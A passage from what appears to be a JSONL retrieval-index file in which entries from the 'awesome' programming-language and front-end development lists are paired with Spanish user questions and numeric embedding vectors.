Languages", "tema": "programming languages", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Programming Languages: Esolangs β€” Programming languages designed for experimentation or as jokes rather than actual use. VBA β€” An event-driven version of Visual Basic 6.0 built into most Microsoft Office apps for automation and scripting. F# β€” A .NET-based language with focus on functional programming.", "indexar": "ΒΏcuΓ‘l es un lenguaje de programaciΓ³n divertido o experimental?", "v": [-0.0508, 0.08079, -0.14855, -0.20138, -0.16154, -0.06659, -0.045, 0.00538, 0.02408, -0.0726, 0.04498, 0.05431, -0.05347, 0.03357, -0.00535, 0.02528, 0.08978, -0.00145, -0.00108, -0.06938, -0.0279, 0.02253, -0.14129, 0.00659, 0.03214, -0.03556, -0.00316, -0.01145, 0.04623, 0.00773, -0.02272, 0.15928, 0.16152, -0.09851, -0.15775, 0.10274, 0.08224, 0.0378, 0.01451, 0.12317, 0.01769, -0.03078, -0.05229, -0.00848, 0.01359, 0.02575, 0.03946, 0.01787, 0.01531, -0.0531, -0.00686, 0.07452, 0.03523, -0.01584, 0.08944, -0.0316, 0.03591, -0.10318, 0.01419, -0.13513, 0.00268, 0.016, 0.00556, -0.03639, 0.05825, 0.01858, 0.09139, 0.00038, 0.00932, -0.0146, 0.04393, 0.06519, -0.1235, 0.0276, 0.05161, 0.08465, -0.08999, -0.02286, 0.12047, 0.06008, -0.05895, -0.03484, 0.10423, 0.04485, -0.04392, -0.00153, 0.06724, -0.11162, -0.01579, 0.008, 0.0215, 0.06883, -0.06257, -0.06091, -0.00888, -0.07081, 0.08324, -0.00839, 0.02719, 0.16903, 0.00506, -0.06065, -0.15326, 0.10209, -0.05226, 0.08874, 0.10992, -0.07319, 0.06014, 0.02903, 0.06668, -0.04503, -0.01237, -0.07739, -0.06747, -0.00999, 0.08663, -0.04891, 0.04008, -0.05245, -0.038, 0.09304, 0.0022, 0.06612, 0.0131, 0.05183, 0.12841, 0.13441, -0.0269, 0.12274, -0.00397, -0.06054, 0.04324, 0.02727, -0.02222, 0.06042, 0.1586, -0.0601, 0.04702, -0.05979, 0.0415, 0.06024, 0.02829, 0.03752, 0.07363, 0.02322, 0.03509, -0.0398, -0.05113, 0.08704, -0.01003, 0.01491, 0.0827, 0.14093, -0.07241, -0.01223, 0.09639, -0.03803, -0.12415, 0.04045, -0.00239, -0.02245, -0.05382, -0.03912, 0.0263, -0.00885, -0.0737, -0.03391, 0.13795, 0.01396, -0.00076, 0.02475, 0.06973, -0.02357, 0.01259, 0.00862, 0.00956, -0.01328, -0.03086, -0.15918, -0.06881, 0.01015, -0.08287, -0.08219, -0.00103, -0.09229, -0.01131, -0.05736, -0.02668, -0.03309, 0.01028, 0.0414, -0.0377, -0.06439, -0.02179, -0.0458, 0.00944, -0.04625, -0.0143, -0.0386, 0.02354, -0.00452, 0.01279, -0.0188, 0.00283, 0.08514, -0.00901, 0.02997, -0.05437, 0.0514, 0.03857, -0.05608, 0.00717, -0.00518, 0.00114, -0.01709, -0.02215, 0.01397, 0.01722, 0.01841, -0.02496, 0.01233, 0.07418, -0.00832, -0.01481, -0.03032, 0.02726, 0.05812, 0.05397, 0.03248, 0.00959, 0.04356, 0.01961, -0.0232, 0.07819, 0.03225, 0.00071, 0.02127, -0.01509, -0.094, -0.01957, 0.10436, -0.08119, -0.02268, -0.06033, -0.02647, -0.02284, 0.01439, -0.00778, -0.00225, -0.00493, -0.01576, -0.00551, -0.0849, -0.01337, 0.03889]} -{"tipo": "pregunta", "herramienta": "Programming Languages", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Programming Languages", "tema": "programming languages", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Programming Languages: Esolangs β€” Programming languages designed for experimentation or as jokes rather than actual use. VBA β€” An event-driven version of Visual Basic 6.0 built into most Microsoft Office apps for automation and scripting. F# β€” A .NET-based language with focus on functional programming.", "indexar": "necesito una herramienta para hacer automatizaciones dentro de Office, ΒΏquΓ© lenguaje me recomiendas?", "v": [-0.09738, 0.18258, -0.09958, -0.16538, 0.02669, -0.12711, -0.12645, -0.00823, -0.14801, -0.06718, -0.06115, -0.08324, 0.03232, -0.00924, 0.0648, 0.05861, 0.14503, -0.0374, -0.01112, 0.03692, 0.01482, -0.08912, -0.1353, -0.00452, -0.04743, -0.08706, 0.14012, -0.04107, -0.1639, 0.0951, -0.11236, 0.07707, 0.04847, -0.0478, -0.04258, 0.07085, -0.01058, 0.06441, 0.02205, 0.07649, 0.02754, 0.16497, -0.10957, 0.09423, 0.06534, 0.06752, 0.04207, -0.02081, -0.02143, 0.07056, -0.02324, -0.19023, 0.01936, 0.02169, 0.01293, -0.0909, 0.1993, -0.04427, -0.00219, -0.16413, -0.01194, 0.00277, -0.00914, 0.01822, -0.04406, -0.01781, 0.05662, -0.08966, 0.05333, 0.0214, -0.0628, -0.02123, 0.0107, 0.03489, 0.0124, 0.02373, 0.01578, -0.02474, 0.08269, 0.05106, 0.06043, 0.04696, -0.00128, -0.01365, -0.04874, -0.10844, 0.08693, 0.00573, 0.0241, -0.07788, -0.05817, 0.01692, -0.03965, -0.09471, -0.02664, -0.03948, -0.00409, -0.08488, -0.03028, 0.08192, 0.11737, -0.11523, -0.10731, 0.09149, -0.06424, -0.0493, -0.00161, -0.00672, -0.05692, 0.01511, 0.07207, -0.01451, 0.01824, -0.02977, -0.01296, 0.00717, 0.08872, -0.02946, 0.03008, -0.02089, -0.00608, 0.07805, -0.09775, -0.04747, -0.03498, -0.10079, 0.06987, 0.07375, 0.01475, -0.01873, -0.03737, -0.04924, -0.00511, -0.06909, 0.02631, 0.10271, 0.1136, -0.11108, -0.0211, -0.09579, 0.00215, 0.00635, -0.06174, -0.03525, 0.09197, 0.07817, 0.06629, -0.05342, -0.04275, 0.02786, 0.03186, -0.03654, 0.09016, 0.0069, 0.01101, -0.02333, 0.04987, 0.0005, -0.09068, -0.01129, 0.05432, -0.0534, 0.0108, 0.04393, 0.00818, -0.03657, -0.02234, 0.03234, 0.0504, 0.00083, 0.09911, -0.02433, 0.06797, -0.03382, -0.01263, -0.03085, 0.00726, 0.05949, -0.0374, -0.09543, -0.04343, 0.02373, -0.05536, -0.03492, 0.05464, 0.01773, 0.06682, -0.1243, -0.04295, 0.0729, -0.0633, 0.02813, -0.02604, -0.11139, 0.05853, -0.00539, 0.0017, -0.04787, 0.02666, -0.0609, -0.06064, -0.02414, -0.05127, -0.07249, 0.01079, 0.09211, -0.01872, -0.02088, -0.04228, 0.03327, 0.06065, -0.02309, 0.00701, 0.02477, -0.00589, -0.02091, -0.06866, 0.04584, -0.01422, -0.02356, 0.04729, -0.01096, 0.0423, -0.02609, 0.01442, 0.00199, 0.03441, 0.01985, 0.04736, 0.01963, 0.00909, 0.00866, 0.01602, -0.03508, 0.03745, -0.02251, 0.01109, -0.03809, -0.01258, -0.03311, 0.01735, 0.07085, -0.02461, -0.0098, -0.06258, -0.02285, -0.01482, -0.01387, -0.04299, -0.06205, 0.01969, 0.00585, 0.02182, -0.04031, 0.0281, -0.00798]} -{"tipo": "pregunta", "herramienta": "Programming Languages", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Programming Languages", "tema": "programming languages", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Programming Languages: Esolangs β€” Programming languages designed for experimentation or as jokes rather than actual use. VBA β€” An event-driven version of Visual Basic 6.0 built into most Microsoft Office apps for automation and scripting. F# β€” A .NET-based language with focus on functional programming.", "indexar": "busco alternativas a Visual Basic 6.0 con enfoque en la programaciΓ³n funcional para .NET", "v": [0.0326, -0.01589, -0.27132, -0.17338, -0.0385, -0.08152, -0.04762, -0.06446, -0.06233, -0.03619, 0.07505, -0.0845, -0.15286, 0.05317, 0.02308, 0.10738, -0.05701, -0.17861, -0.03459, 0.08054, 0.00297, 0.00984, -0.03715, 0.06967, 0.09194, 0.13847, -0.09181, -0.05724, 0.05093, 0.01851, 0.08245, 0.03074, 0.04686, 0.01344, 0.04538, -0.10671, -0.01021, 0.03185, 0.0451, -0.05547, -0.03251, 0.15, -0.05783, 0.13833, -0.03636, 0.0058, 0.04727, -0.03502, -0.0283, -0.04586, -0.07959, 0.05708, -0.0859, 0.05293, -0.00893, -0.13269, 0.05816, -0.07437, 0.06223, -0.07461, 0.01306, 0.03993, 0.07445, -0.11242, 0.07378, 0.06272, 0.12345, 0.0186, -0.0904, 0.09045, -0.05419, 0.0758, -0.09257, -0.02622, 0.04099, 0.05256, 0.02058, -0.02433, 0.11282, 0.07443, -0.03951, -0.05642, -0.06931, 0.13438, -0.1365, -0.06279, 0.0566, 0.01534, -0.07026, -0.01786, 0.10954, -0.02502, -0.11178, -0.03323, -0.03639, -0.01, 0.0309, 0.07721, 0.00149, 0.05908, 0.0235, -0.0789, -0.10472, 0.04541, 0.04941, -0.00876, 0.12663, 0.04983, -0.13078, 0.07449, -0.00839, -0.05972, 0.00118, 0.02266, -0.01574, 0.02506, -0.0005, 0.04685, 0.02816, 0.00703, -0.0569, 0.10585, -0.04172, -0.03485, 0.0753, -0.01354, -0.0396, 0.1155, 0.05116, 0.04059, 0.00206, -0.0336, -0.02691, 0.01083, -0.06941, 0.06916, 0.14147, -0.04611, 0.04969, -0.04272, 0.08516, 0.03433, 0.02875, 0.07563, 0.0243, 0.0079, 0.01752, -0.05974, -0.05219, 0.0491, 0.0031, -0.02329, 0.01881, 0.02002, -0.14913, -0.01846, -0.04554, -0.04579, -0.10041, 0.02122, -0.01407, -0.06047, -0.02041, -0.07478, -0.06167, -0.06389, -0.01809, 0.01154, 0.04485, 0.07726, 0.03097, 0.07798, -0.04387, 0.02231, -0.0548, -0.01743, -0.0705, -0.03331, -0.01686, -0.06636, -0.02408, 0.01933, -0.03383, 0.08804, 0.00533, -0.09811, 0.01059, -0.02692, 0.03223, -0.02025, -0.01763, 0.01933, -0.02827, -0.01107, 0.03843, -0.00259, -0.11548, -0.05109, -0.05829, -0.00168, -0.00952, -0.01363, 0.01343, -0.05298, 0.00717, 0.06533, 0.02962, 0.08797, -0.05429, 0.02384, -0.02037, -0.06539, 0.02063, -0.04284, -0.037, -0.0329, 0.08168, -0.06317, 0.03518, 0.08394, -0.05204, -0.04655, -0.01399, 0.03803, 0.01544, -0.03085, -0.00712, 0.03853, 0.00848, 0.0022, -0.00994, -0.0186, 0.00568, 0.00416, -0.01324, -0.0224, -0.04569, 0.01566, -0.01634, -0.02205, -0.01352, -0.01257, -0.06442, 0.0305, 0.01007, -0.04785, -0.05514, 0.04509, 0.02236, -0.01801, -0.06687, 0.04187, 0.0077, -0.03402, 0.01614, -0.0365]} -{"tipo": "pregunta", "herramienta": "Front-End Development", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Front-End Development", "tema": "front-end development", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Front-End Development: ES6 Tools. Web Performance Optimization. Web Tools. CSS β€” Style sheet language that specifies how HTML elements are displayed on screen. Critical-Path Tools. Scalability. Must-Watch Talks. Protips. Frameworks. React β€” JavaScript library for building user interfaces. Relay β€” Framework for building data-driven React apps. React Hooks β€” Lets you use state and other React features without writing a class. Web Components. Polymer β€” JavaScript library to develop Web Components. Angular β€” App framework. Backbone β€” App framework. HTML5 β€” Markup language used for websites & web apps. SVG β€” XML-based vector image format. Canvas. KnockoutJS β€” JavaScript library. Dojo Toolkit β€” JavaScript toolkit. Inspiration. Ember β€” App framework. Android UI. iOS UI. Meteor. BEM. Flexbox. Web Typography. Web Accessibility. Material Design. D3 β€” Library for producing dynamic, interactive data visualizations. Emails. jQuery β€” Easy to use JavaScript library for DOM manipulation. Tips. Web Audio. Offline-First. Static Website Services.", "indexar": "que biblioteca de JavaScript sirve para crear interfaces reactivas y modernas?", "v": [0.05837, -0.04592, -0.22421, -0.20855, 0.05378, -0.15624, -0.07493, 0.03957, 0.03156, -0.09481, 0.00089, -0.20228, -0.00881, -0.05349, 0.12357, 0.08654, 0.10444, -0.01369, 0.02165, -0.06676, 0.12537, 0.02149, -0.13125, -0.02182, 0.02289, 0.01377, -0.01939, 0.04789, -0.05678, 0.05965, 0.01396, -0.01869, 0.02269, -0.02038, -0.08396, -0.02233, 0.04181, 0.00559, -0.07582, 0.07129, 0.02827, 0.06829, -0.02247, 0.03378, -0.0533, 0.00092, 0.09522, 0.00769, -0.08178, 0.09161, -0.05851, 0.04305, -0.15838, 0.12384, -0.06919, -0.03542, 0.04615, -0.14313, -0.0227, -0.11654, -0.10949, 0.09247, -0.06446, -0.10599, 0.12194, -0.09643, -0.0598, -0.01727, -0.03813, 0.04195, -0.10907, -0.00898, -0.0369, -0.04983, -0.01221, 0.08586, -0.11972, -0.05286, 0.02336, 0.08317, -0.01317, -0.00823, -0.02355, -0.00315, -0.03104, 0.06201, 0.05903, -0.06932, 0.00365, 0.01554, -0.04828, 0.01578, -0.06757, -0.06565, 0.06247, -0.08814, 0.0223, -0.02916, 0.0823, 0.03395, -0.04342, -0.06369, -0.04872, 0.0224, 0.0366, -0.0047, -0.01577, -0.06774, 0.04772, -0.07161, 0.07739, 0.01782, 0.06917, -0.06398, 0.05248, 0.05923, 0.05884, -0.04805, 0.0834, 0.07957, -0.11061, -0.07549, -0.04442, -0.1018, -0.02345, 0.08132, 0.07279, 0.0456, 0.04891, 0.02921, -0.07642, -0.05826, -0.09705, -0.01189, 0.01182, 0.09895, 0.0747, -0.08916, -0.04251, -0.06651, 0.0728, 0.01369, -0.01177, -0.06103, -0.04749, -0.07037, 0.06909, 0.00419, -0.07071, -0.03613, -0.01647, -0.04628, 0.04521, 0.06657, -0.0669, 0.00949, 0.00174, -0.02458, -0.0449, 0.09624, -0.05029, 0.05998, 0.03203, -0.0254, -0.0827, -0.08331, -0.07662, 0.03617, 0.11444, 0.05566, -0.00991, -0.01182, 0.02982, -0.04822, -0.00312, -0.00449, -0.04529, 0.00805, 0.05189, 0.03313, -0.00962, -0.04608, -0.06892, -0.03077, -0.08563, -0.10389, 0.0146, -0.03409, -0.03085, -0.04364, -0.07521, 0.05964, -0.01549, -0.01398, 0.03499, 0.04378, -0.00745, -0.00256, -0.00588, -0.05737, 0.06515, 0.03039, -0.03715, 0.02867, -0.02694, 0.04486, -0.03614, 0.05578, -0.04743, -0.05449, 0.00029, 0.00307, 0.00975, 0.03953, -0.03097, -0.07649, -0.01715, 0.03381, 0.06243, -0.05316, 0.02536, -0.03161, 0.03366, -0.00527, 0.07037, -0.01204, -0.03339, -0.01847, 0.05506, -0.02714, -0.00061, -0.07451, -0.01415, 0.00287, -0.00868, -0.01162, 0.03642, 0.02307, -0.05234, -0.06382, -0.02342, 0.08901, -0.08125, -0.03448, -0.03032, -0.0483, -0.0921, 0.00708, -0.00347, -0.07869, -0.07582, -0.04079, -0.00527, -0.01022, 0.06313, -0.02174]} -{"tipo": "pregunta", "herramienta": "Front-End Development", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Front-End Development", "tema": "front-end development", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Front-End Development: ES6 Tools. Web Performance Optimization. Web Tools. CSS β€” Style sheet language that specifies how HTML elements are displayed on screen. Critical-Path Tools. Scalability. Must-Watch Talks. Protips. Frameworks. React β€” JavaScript library for building user interfaces. Relay β€” Framework for building data-driven React apps. React Hooks β€” Lets you use state and other React features without writing a class. Web Components. Polymer β€” JavaScript library to develop Web Components. Angular β€” App framework. Backbone β€” App framework. HTML5 β€” Markup language used for websites & web apps. SVG β€” XML-based vector image format. Canvas. KnockoutJS β€” JavaScript library. Dojo Toolkit β€” JavaScript toolkit. Inspiration. Ember β€” App framework. Android UI. iOS UI. Meteor. BEM. Flexbox. Web Typography. Web Accessibility. Material Design. D3 β€” Library for producing dynamic, interactive data visualizations. Emails. jQuery β€” Easy to use JavaScript library for DOM manipulation. Tips. Web Audio. Offline-First. Static Website Services.", "indexar": "quΓ© herramienta me ayuda a optimizar la velocidad de carga de mi sitio web?", "v": [0.05109, 0.08341, -0.14402, -0.13727, -0.04811, -0.01424, -0.15415, -0.00992, -0.08338, -0.11583, -0.1213, -0.09658, -0.00493, -0.04353, 0.13115, 0.0327, 0.0752, -0.06777, -0.01711, -0.05167, 0.05086, -0.07371, -0.10612, -0.10899, -0.06206, -0.0307, 0.08671, 0.04769, -0.31451, 0.01475, -0.02646, 0.07358, 0.04895, 0.00073, -0.08834, 0.00742, -0.00301, 0.01889, 0.01967, -0.04757, -0.05618, 0.05808, -0.04187, 0.00406, 0.09921, 0.06026, 0.00478, 0.00305, 0.02452, -0.0342, 0.02981, -0.1445, -0.05502, -0.11764, -0.039, 0.00203, 0.22828, -0.18241, 0.05707, -0.11282, -0.02535, 0.02778, -0.11381, -0.0527, -0.01992, 0.04218, 0.03092, 0.01076, -0.09909, 0.05406, 0.02536, -0.01859, 0.0769, -0.06293, 0.04093, -0.04079, 0.05873, 0.02649, 0.0671, -0.03033, 0.17474, -0.01046, -0.12138, 0.06112, -0.06107, -0.05356, 0.01067, -0.05339, 0.01514, -0.02729, 0.02956, -0.00996, 0.0052, -0.0057, -0.09627, -0.03793, 0.09605, -0.04927, 0.0415, -0.03405, 0.10593, -0.06264, -0.05947, -0.03536, 0.08819, 0.04203, -0.06222, -0.02937, -0.09871, 0.03914, 0.1591, -0.00978, 0.06119, -0.06464, -0.08129, 0.05143, -0.02038, -0.04722, -0.05059, -0.08911, -0.01187, 0.0575, -0.05673, -0.00488, -0.05655, 0.00724, 0.01383, 0.06781, -0.01056, -0.15132, 0.0597, -0.10379, -0.08436, -0.06824, 0.04129, 0.01, -0.006, -0.10762, 0.02227, 0.01365, 0.01479, -0.09682, -0.11425, -0.07422, -0.00066, -0.02524, 0.04446, 0.01317, -0.09573, 0.0005, 0.01645, 0.00677, 0.06745, -0.05382, -0.03757, -0.03229, -0.06351, 0.00292, -0.04418, -0.03723, 0.01008, 0.00697, 0.05144, -0.02306, -0.00402, -0.0004, 0.00139, 0.11894, 0.01638, 0.01013, 0.00492, -0.01184, -0.00046, -0.07864, -0.01813, -0.02656, -0.05323, 0.01367, -0.00565, -0.03165, -0.01984, -0.02059, -0.01102, -0.0342, -0.04275, -0.03922, 0.03437, -0.03564, -0.00792, 0.04183, 0.00541, 0.02455, 0.02657, -0.05387, 0.0318, 0.02705, -0.05527, -0.01943, 0.07332, -0.00179, -0.02971, -0.1007, -0.03534, -0.04128, -0.0296, 0.07385, 0.0059, -0.05528, -0.00702, -0.02885, 0.00971, 0.00127, 0.05786, 0.00413, -0.01543, -0.01234, 0.05897, -0.01946, -0.04647, -0.0381, 0.04622, 0.01723, 0.00079, 0.02515, -0.0141, 0.04407, 0.06711, 0.01901, -0.0247, -0.00031, -0.00377, -0.04533, -0.02805, -0.03745, 0.0382, -0.0803, -0.00889, -0.04289, -0.06875, 0.01517, -0.01884, 0.02352, 0.01774, -0.00723, 0.02748, 0.00443, -0.04314, -0.04224, -0.04735, -0.02436, -0.04564, -0.01039, 0.06094, -0.04979, 0.03647, -0.01378]} -{"tipo": "pregunta", "herramienta": "Front-End Development", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Front-End Development", "tema": "front-end development", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Front-End Development: ES6 Tools. Web Performance Optimization. Web Tools. CSS β€” Style sheet language that specifies how HTML elements are displayed on screen. Critical-Path Tools. Scalability. Must-Watch Talks. Protips. Frameworks. React β€” JavaScript library for building user interfaces. Relay β€” Framework for building data-driven React apps. React Hooks β€” Lets you use state and other React features without writing a class. Web Components. Polymer β€” JavaScript library to develop Web Components. Angular β€” App framework. Backbone β€” App framework. HTML5 β€” Markup language used for websites & web apps. SVG β€” XML-based vector image format. Canvas. KnockoutJS β€” JavaScript library. Dojo Toolkit β€” JavaScript toolkit. Inspiration. Ember β€” App framework. Android UI. iOS UI. Meteor. BEM. Flexbox. Web Typography. Web Accessibility. Material Design. D3 β€” Library for producing dynamic, interactive data visualizations. Emails. jQuery β€” Easy to use JavaScript library for DOM manipulation. Tips. Web Audio. Offline-First. Static Website Services.", "indexar": "con quΓ© librerΓ­a puedo generar visualizaciones interactivas de datos fΓ‘cilmente?", "v": [0.03444, 0.10256, -0.1869, 0.00994, 0.09521, -0.07895, -0.07803, -0.04528, -0.0142, -0.19141, 0.09462, -0.19178, -0.08915, 0.03659, 0.09795, 0.13252, 0.1057, -0.15016, -0.01993, -0.07513, 0.0272, -0.02528, -0.14326, -0.19121, -0.09581, -0.07159, -0.00374, -0.05096, 0.00482, 0.12449, 0.00115, -0.03424, 0.02351, 0.00817, -0.11818, -0.03082, 0.02664, 0.14224, 0.06204, -0.13099, -0.02589, 0.09188, -0.08009, 0.09039, 0.06193, -0.02332, -0.05842, 0.04805, -0.10658, 0.01148, -0.0145, 0.0666, -0.10203, -0.01082, 0.05542, -0.13205, 0.14117, -0.11653, 0.0774, -0.02392, -0.02487, 0.11999, 0.07161, -0.05555, 0.03649, 0.0377, 0.04296, -0.00743, -0.06331, 0.14631, -0.00446, 0.01876, 0.05105, 0.02465, 0.0495, 0.04068, -0.06374, -0.03263, 0.01195, 0.07923, -0.02457, -0.02701, 0.01645, 0.01011, -0.01994, 0.03829, -0.01551, -0.05183, 0.00303, -0.12163, 0.07406, 0.00973, -0.0154, -0.02984, 0.0052, 0.03468, -0.03639, -0.04606, -0.01962, 0.05758, -0.0658, 0.01415, -0.12623, 0.06971, 0.05822, -0.03288, 0.01879, 0.0466, -0.0896, -0.07669, 0.01337, -0.04904, -0.0361, -0.0311, -0.04017, 0.00935, 0.04223, 0.02234, 0.08393, 0.0269, 0.00895, -0.03872, 0.04275, -0.03838, -0.01302, -0.01404, 0.01639, 0.08418, -0.00137, 0.00775, -0.03246, -0.08724, -0.01372, -0.06298, 0.03664, -0.00059, -0.07137, -0.14002, 0.03133, -0.06287, 0.02922, 0.00126, 0.01465, 0.00518, -0.07317, -0.07717, 0.04963, 0.01574, -0.07853, 0.05526, -0.03794, -0.06345, 0.05569, 0.04747, -0.03076, 0.09392, 0.04973, -0.07918, -0.04079, -0.02349, -0.01852, 0.06542, -0.03959, 0.07927, -0.07009, -0.0516, -0.06519, -0.00382, 0.06658, 0.0068, -0.10811, 0.04551, 0.02609, -0.10712, 0.04492, -0.01549, -0.08077, -0.06886, -0.07064, -0.07005, -0.02206, -0.00331, -0.00471, -0.0365, -0.04674, -0.0587, 0.03394, -0.07858, -0.00553, -0.02044, -0.02163, 0.09922, 0.01848, -0.06511, 0.08153, -0.06258, -0.00576, 0.0765, 0.00568, -0.04671, -0.02521, 0.01722, -0.02716, 0.0558, 0.01463, 0.02787, -0.01739, 0.0757, 0.03014, -0.03789, 0.00904, 0.00668, 0.07546, -0.01487, -0.01731, -0.03934, 0.00386, 0.0011, -0.00357, -0.00225, 0.04089, 0.05473, 0.04856, -0.00158, 0.02822, -0.01106, 0.05992, 0.01656, 0.01152, 0.03057, -0.03333, -0.00976, 0.04842, 0.01848, 0.03554, 0.00096, -0.0232, 0.01053, -0.01745, -0.0547, 0.04167, 0.06959, -0.0729, -0.00872, 0.0165, -0.08007, -0.07626, 0.03271, -0.02782, -0.08735, -0.06037, -0.05745, 0.01065, -0.02199, -0.01071, -0.06138]} -{"tipo": "pregunta", "herramienta": "Front-End Development", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Front-End Development", "tema": "front-end development", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Front-End Development: Cycle.js β€” Functional and reactive JavaScript framework. Text Editing. Motion UI Design. Vue.js β€” App framework. Marionette.js β€” App framework. Aurelia β€” App framework. Charting. Ionic Framework. Chrome DevTools. PostCSS β€” CSS tool. Draft.js β€” Rich text editor framework for React. Service Workers. Progressive Web Apps. choo β€” App framework. Redux β€” State container for JavaScript apps. Browserify β€” Module bundler. Sass β€” CSS preprocessor. Ant Design β€” Enterprise-class UI design language. Less β€” CSS preprocessor. WebGL β€” JavaScript API for rendering 3D graphics. Preact β€” App framework. Progressive Enhancement. Next.js β€” Framework for server-rendered React apps. lit β€” Library for building web components with a declarative template system. JAMstack β€” Modern web development architecture based on client-side JavaScript, reusable APIs, and prebuilt markup. WordPress-Gatsby β€” Web development technology stack with WordPress as a back end and Gatsby as a front end. Mobile Web Development β€” Creating a great mobile web experience.", "indexar": "que herramienta sirve para crear aplicaciones reactivas en JavaScript?", "v": [-0.07391, 0.04593, -0.18913, -0.29932, 0.05478, -0.14462, -0.0779, 0.01903, 0.07884, -0.00503, -0.04085, -0.23619, -0.02287, -0.10846, 0.12328, 0.09333, 0.06485, -0.06621, 0.011, 0.06963, 0.02414, -0.0127, -0.18475, -0.08439, -0.09448, 0.09546, 0.012, 0.0337, -0.15052, 0.04345, 0.02536, 0.00221, 0.01805, -0.07511, -0.15304, -0.04256, 0.01902, -0.01694, -0.04196, 0.11043, 0.00416, 0.04166, -0.08586, 0.0326, -0.08608, 0.07354, 0.06575, 0.03158, -0.09114, 0.05339, 0.02039, -0.04463, -0.15652, 0.06951, -0.05007, -0.05173, 0.12499, -0.19653, -0.00713, -0.08507, -0.10636, 0.01458, -0.07409, -0.06399, 0.03818, -0.08273, 0.03423, 0.0032, -0.03632, 0.02498, -0.07809, 0.03097, -0.05098, -0.02261, 0.07994, 0.00986, -0.06814, -0.01944, -0.05192, 0.03026, -0.00693, 0.00168, -0.06728, 0.02475, -0.02936, -0.00944, 0.07511, 0.0001, 0.02352, -0.06964, -0.05216, 0.03703, -0.05394, -0.01998, 0.01593, -0.04608, 0.09063, -0.06636, 0.08757, 0.0794, 0.05891, -0.12529, -0.06605, -0.06192, -0.0146, 0.03453, 0.00444, -0.06416, -0.04532, 0.01847, 0.07341, -0.04997, 0.0392, 0.01545, 0.04467, 0.07261, -0.00507, -0.10824, 0.02382, -0.02076, -0.00813, -0.0046, -0.04068, -0.09644, 0.00106, 0.05461, -0.02904, 0.06259, -0.01773, 0.00811, -0.02399, -0.06923, -0.13504, 0.0405, -0.00151, 0.01274, 0.09161, -0.0622, -0.00558, -0.03428, 0.02211, 0.0316, -0.00754, -0.05476, 0.0213, 0.01388, 0.03634, 0.01155, 0.00495, 0.0209, 0.03155, -0.11782, -0.01552, 0.00057, -0.10837, -0.05603, -0.06215, 0.0082, -0.03601, 0.05188, -0.08037, 0.03033, -0.00031, -0.00714, -0.02071, -0.10347, 0.02039, 0.00898, 0.09182, 0.10195, 0.03236, 0.01502, 0.10709, -0.06436, 0.00797, -0.0369, -0.03481, -0.03299, -0.00904, -0.074, 0.00064, -0.09056, -0.02455, 0.01151, 0.01598, -0.06233, 0.01983, 0.00558, 0.00545, 0.05079, -0.08852, 0.06946, 0.01804, -0.05379, 0.03964, 0.06397, 0.02349, -0.09418, 0.00653, -0.00283, -0.00952, 0.0112, -0.03861, -0.01256, -0.02669, 0.05556, -0.01239, 0.02031, -0.03208, 0.00492, -0.02035, 0.00121, 0.01947, 0.06934, 0.01171, -0.06066, 0.03743, 0.0657, 0.01188, 0.00111, 0.01985, -0.0232, -0.00366, -0.01663, 0.01456, 0.03809, -0.00896, 0.00336, 0.00384, -0.02441, 0.04082, -0.09492, -0.01072, -0.02146, -0.0206, -0.05776, 0.03097, 0.0044, -0.03259, -0.02259, -0.02485, 0.03932, -0.00325, -0.02242, -0.06354, -0.01185, -0.00568, -0.01552, -0.02621, -0.05706, -0.06175, -0.00452, 0.04051, -0.02057, 0.03625, 0.02093]} -{"tipo": "pregunta", "herramienta": "Front-End Development", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Front-End Development", "tema": "front-end development", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Front-End Development: Cycle.js β€” Functional and reactive JavaScript framework. Text Editing. Motion UI Design. Vue.js β€” App framework. Marionette.js β€” App framework. Aurelia β€” App framework. Charting. Ionic Framework. Chrome DevTools. PostCSS β€” CSS tool. Draft.js β€” Rich text editor framework for React. Service Workers. Progressive Web Apps. choo β€” App framework. Redux β€” State container for JavaScript apps. Browserify β€” Module bundler. Sass β€” CSS preprocessor. Ant Design β€” Enterprise-class UI design language. Less β€” CSS preprocessor. WebGL β€” JavaScript API for rendering 3D graphics. Preact β€” App framework. Progressive Enhancement. Next.js β€” Framework for server-rendered React apps. lit β€” Library for building web components with a declarative template system. JAMstack β€” Modern web development architecture based on client-side JavaScript, reusable APIs, and prebuilt markup. WordPress-Gatsby β€” Web development technology stack with WordPress as a back end and Gatsby as a front end. Mobile Web Development β€” Creating a great mobile web experience.", "indexar": "con quΓ© puedo diseΓ±ar interfaces de usuario funcionales y dinΓ‘micas?", "v": [0.23497, 0.10343, -0.13095, -0.11231, 0.14923, -0.00889, -0.04414, -0.01778, -0.04707, -0.03611, 0.04445, -0.03852, -0.15884, -0.16124, -0.02303, 0.00611, 0.17134, -0.05424, -0.11485, -0.06076, 0.01438, -0.02001, -0.13894, 0.0078, -0.03662, -0.03976, 0.03699, -0.07823, -0.05328, 0.00486, 0.08803, 0.00719, 0.17746, -0.08739, -0.06007, -0.09044, -0.06711, 0.00581, 0.07177, -0.02948, 0.0109, 0.03851, -0.10813, 0.05423, 0.01663, 0.08242, -0.06225, -0.11104, -5e-05, 0.02745, -0.04486, -0.02439, -0.04255, 0.04218, 0.07462, -0.10983, 0.18384, -0.13908, 0.07144, -0.06366, 0.01896, 0.07344, 0.0847, 0.06466, 0.04436, -0.07688, -0.02442, -0.09716, 0.01217, 0.05455, -0.01602, 